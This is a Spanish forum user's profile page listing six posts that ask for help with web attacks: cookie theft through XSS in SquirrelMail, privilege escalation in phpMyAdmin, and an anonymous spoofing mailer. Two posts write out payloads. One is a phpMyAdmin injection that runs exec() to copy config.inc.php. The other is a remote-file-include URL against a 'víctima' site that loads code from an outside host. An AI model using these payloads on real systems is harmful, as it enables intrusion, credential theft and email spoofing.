Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Rienzi

#1
Buenas, hoy he escaneado mi sitio web en busca de vulns y me ha aparecido que este directorio se encuentra público: /cgi-sys/Count.cgi  ¿Qué problemas y riesgos ha podido acarrearme?
#2
Hola!, llevo ya un rato ojeando paginas pero no logro encontrar nada factible sobre los Token en phpmyadmin el caso es que  estoy con la sesion iniciada dentro de phpmyadmin pero no se de donde sacar el Token actual de la sesion para comprobar si es vuln a esta inject:

/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]

salu2.
#3
Nivel Web / [DUDA] Steal Cookies con XSS
17 Enero 2009, 19:54 PM
Hola, estoy testeando la seguridad de mi webmail un SquirrelMail con version 1.4.9a, buscando por security focus he encontrado lo siguiente:
http://www.securityfocus.com/bid/23910/discuss
Bien, una vez encontrada dicha informacion me he puesto manos a la obra buscando informacion sobre Steal de Cookies mediante XXS por Sangoogle despues de ojear varios manuales en ingles he podido entender que para almacenar una cookie remota un usuario deberia ejecutar una direccion web maliciosa con un script en php estando dentro de SquirrelMail, esto haria que al ejecutar la direccion web la cookie del administrador quedaria plasmada en otro archivo independiente, todo ese proceso como es evidente lo he entendido a la perfeccion.
El problema ha venido hace unos minutos cuando me he dispuesto a buscar un tutorial mas completo donde añada el codigo fuente para utilizarlo, he encontrado varios video tutoriales en milworm los cuales apenas daban informacion para compilarlo, alguien seria tan amable de darme a conocer algun buen tutorial donde expliquen los pasos detallados aun que este este en ingles?, gracias.
#4
Buenas, estoy intentando hacer un mailer anonymo en VB 6.0, tengo ya la parte gráfica totalmente completa, ahora me toca empezar con la escrita y me gustaría saber como puedo hacer que el usuario cuando rellene el formulario (servidor smtp, mail falso y mail víctima), se conecte con el servidor smtp especificado y remita los datos especificados.
#5
Buenas, resulta que puedo iniciar sesion con cualquier nombre de usuario en un servidor de phpmyadmin debido a una extraña vuln la cual simple solucion es reiniciar la configuracion, bien pues me gustaria saber si hay algun modo de escalar privilegios.
PD:Las tablas users/admin etc.. no estan solo me muestra 1 y no me deja añadir mas tablas pero si modificarlas esto ultimo no me sirve de nada pues no quiero perjudicar a nadie.
#6
Nivel Web / [?] File include
20 Agosto 2007, 13:53 PM
Saludos!! me gustaría comprender el funcionamiento del siguiente Exploit!!

http://www.securityfocus.com/bid/12857/exploit

Que debería hacer?¿? crear un archivo config en mi host y de ahí enlazarlo de la siguiente manera?

http://www.victima.com/research/news/CzarNewsv113b/headlines.php?tpath=http://www.host.org/cn_config.php

También me gustaría saber si con esa vulnerabilidad podría cambiar el index o modificarlo un saludo.